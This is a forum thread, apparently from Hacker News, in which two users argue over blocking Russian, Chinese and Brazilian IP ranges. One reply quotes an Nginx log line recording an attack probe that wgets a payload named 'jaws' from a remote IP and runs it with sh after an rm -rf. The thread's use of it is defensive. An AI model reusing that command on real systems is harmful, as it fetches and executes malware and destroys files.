[b112]

Hilarious. Someone said block China and Russia, and we have a long response "USA bad! China not as bad!".

No mention of Russia, and the original poster probably has nothing to do with the US.

Here's the thing, China and Russia are the wild west of the internet. Someone starts to DDoS a UK IP from the US, and it gets shut down hard and fast.

Someone starts to DDoS from Russia or China, and reports are dropped on the floor. Same for hacking attempts.

And yes, if someone from Russia or China reports to me, errant acitivty, they are listened to.

There is absolutely no comparison. These zones are useless for most companies. No one in China or Russia is buying anything from much of the rest of the world. Russia spews more spam that the rest of the planet combined.

Dropping their IP space on the floor, is the smartest thing a startup can do.

And the manufactured outrage is hilarious. These two countries block everything they can already, meaning legit traffic is rare. The great firewall of China means few will visit your site anyhow.

Drop Russia, China, and even Brazil (whos network ops never ever ever respond to spam reports).

Your admin life will be immensely better, and it will cost you nothing, nada, zilch. All upside, zero downside.

[from]

> Drop Russia, China, and even Brazil (whos network ops never ever ever respond to spam reports).

I don't mean to be presumptuous but what is the benefit of this. Do you spend all day stressing when you see

    112.250.109.154 - - [14/Feb/2023:00:00:18 +0000] "GET /shell?cd+/tmp;rm+-rf+*;wget+94.158.247.123/jaws;sh+/tmp/jaws HTTP/1.1" 404 153 "-" "Hello, world"

in your Nginx logs? Actual financial fraud occurs using US residential proxies. Automated scanning occurs in those countries because they have a bunch of cheap insecure routers and IoT devices. Writing angry abuse reports all day is misdirected because the scanning device is probably some hacked Hikvision camera, not a master hacker. You'd be better off trying to get the C2 shut down.

[b112]

So out of endless ways to ruin your day, you claim all financial fraud only comes from US proxies (?!?!?!), and ignore all other threats.

Completely untrue.

So getting hacked never happens from Russia? Russian IPs only scan, but never crack in, takeover, deface, or work their way deep?

And spam has 0 cost, right?

Read the equation again.. 0 downside, endless upside.

[from]

> So out of endless ways to ruin your day, you claim all financial fraud only comes from US proxies (?!?!?!), and ignore all other threats.

If you're referring to banking fraud I'm pretty sure the answer is mostly yes. Maybe sometimes fraudsters are lazy.

> So getting hacked never happens from Russia? Russian IPs only scan, but never crack in, takeover, deface, or work their way deep?

It does, I'm just saying it's almost entirely automated scans and bruteforce using default password combinations and several year old CVEs. If you are vulnerable to those you have bigger problems.

> And spam has 0 cost, right?

Unless you are running some ancient configuration the cost is lower than the amount of engineering work and mental capacity you appear to devoting to stopping it.

I'm not saying you shouldn't make the tradeoff or that it's wrong to do it, just that the amount of security you think you are gaining from it is not as high as you think.

[b112]

I love it. Statements peppered with "almost" and "mostly". How if you are updated, well then you're golden, cause mostly it's old CVEs.

Which ignores that even 0.001% of traffic is a load of more skilled bad actors, this IP space is rotten to the core.

Throughout, I have stated 0 downside, all upside. Even one dedicated hacker gone, is a plus in this scenario. Even showing yourself to be actively, aggressively defending is a plus, if comparables are less guarded.

And you're bracketing the use case, others and I have been speaking of the generic. Many run MTAs, so cutting down on inbound spam and malware, pre-filtering is a plus.

Canning all this address space is a never lose, always win, plus plus plus.

Save yourself the grief. Hot potato it.